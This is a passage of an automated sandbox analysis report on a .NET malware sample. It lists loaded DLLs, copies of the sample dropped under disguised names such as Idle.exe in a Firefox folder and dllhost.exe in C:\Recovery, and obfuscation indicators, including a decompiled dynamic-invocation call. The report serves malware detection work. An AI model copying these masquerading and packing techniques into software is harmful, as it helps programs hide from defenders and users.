                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: mscoree.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: apphelp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: version.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: wldp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: profapi.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: mscoree.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: version.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: wldp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: profapi.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: sspicli.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: mscoree.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: apphelp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: version.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: wldp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: profapi.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: sspicli.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: mscoree.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: version.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: wldp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: profapi.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: version.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wldp.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: profapi.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: version.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wldp.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: profapi.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: version.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: wldp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: profapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ktmw32.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rasapi32.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rasman.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rtutils.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: mswsock.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: winhttp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: iphlpapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: dnsapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: winnsi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rasadhlp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: wbemcomn.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: amsi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: userenv.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: winmm.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: winmmbase.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: mmdevapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: devobj.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ksuser.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: avrt.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: audioses.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: powrprof.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: umpdc.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: msacm32.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: midimap.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: version.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: wldp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: profapi.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: mscoree.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: version.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: wldp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: profapi.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeSection loaded: sspicli.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: mscoree.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: version.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: wldp.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: profapi.dll
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDirectory created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDirectory created: C:\Program Files\Mozilla Firefox\defaults\pref\6ccacd8608530fJump to behavior
                          Source: UuIspZT5b6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: UuIspZT5b6.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: UuIspZT5b6.exeStatic file information: File size 1879040 > 1048576
                          Source: UuIspZT5b6.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ca400
                          Source: UuIspZT5b6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.pdb source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000398D000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.cs.Net Code: Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777245)),Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777259))})
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9B8947AC push es; iretd 0_2_00007FFD9B8947AF
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 0_2_00007FFD9BC7125C push ss; ret 0_2_00007FFD9BC7125D
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8947AC push es; iretd 51_2_00007FFD9B8947AF
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8BC37B pushad ; iretd 51_2_00007FFD9B8BC381
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8BAAA2 pushad ; iretd 51_2_00007FFD9B8BAAAA
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8BECF6 pushad ; iretd 51_2_00007FFD9B8BECF7
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8BB4C0 pushad ; iretd 51_2_00007FFD9B8BB4C7
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8A8C16 pushad ; iretd 51_2_00007FFD9B8A8C17
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8A8F2B push ds; retf 51_2_00007FFD9B8A8F31
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8A8289 push ds; iretd 51_2_00007FFD9B8A82BF
                          Source: C:\Recovery\dllhost.exeCode function: 51_2_00007FFD9B8A5DD7 pushad ; iretd 51_2_00007FFD9B8A5DD8
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8BC37B pushad ; iretd 52_2_00007FFD9B8BC381
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8BAAA2 pushad ; iretd 52_2_00007FFD9B8BAAAA
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8BECF6 pushad ; iretd 52_2_00007FFD9B8BECF7
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8BB4C0 pushad ; iretd 52_2_00007FFD9B8BB4C7
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8947AC push es; iretd 52_2_00007FFD9B8947AF
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8A8C16 pushad ; iretd 52_2_00007FFD9B8A8C17
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8A8F2B push ds; retf 52_2_00007FFD9B8A8F31
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8A8289 push ds; iretd 52_2_00007FFD9B8A82BF
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeCode function: 52_2_00007FFD9B8A5DD7 pushad ; iretd 52_2_00007FFD9B8A5DD8
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8BC37B pushad ; iretd 53_2_00007FFD9B8BC381
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8BAAA2 pushad ; iretd 53_2_00007FFD9B8BAAAA
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8BECF6 pushad ; iretd 53_2_00007FFD9B8BECF7
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8BB4C0 pushad ; iretd 53_2_00007FFD9B8BB4C7
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8A8C16 pushad ; iretd 53_2_00007FFD9B8A8C17
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8A8289 push ds; iretd 53_2_00007FFD9B8A82BF
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8A8F2B push ds; retf 53_2_00007FFD9B8A8F31
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8A5DD7 pushad ; iretd 53_2_00007FFD9B8A5DD8
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeCode function: 53_2_00007FFD9B8947AC push es; iretd 53_2_00007FFD9B8947AF
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeCode function: 54_2_00007FFD9B8B47AC push es; iretd 54_2_00007FFD9B8B47AF
                          Source: C:\Recovery\dllhost.exeCode function: 55_2_00007FFD9B8A47AC push es; iretd 55_2_00007FFD9B8A47AF
                          Source: UuIspZT5b6.exeStatic PE information: section name: .text entropy: 7.524831609244645
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe.0.drStatic PE information: section name: .text entropy: 7.524831609244645
                          Source: Idle.exe.0.drStatic PE information: section name: .text entropy: 7.524831609244645
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe0.0.drStatic PE information: section name: .text entropy: 7.524831609244645
                          Source: dllhost.exe.0.drStatic PE information: section name: .text entropy: 7.524831609244645
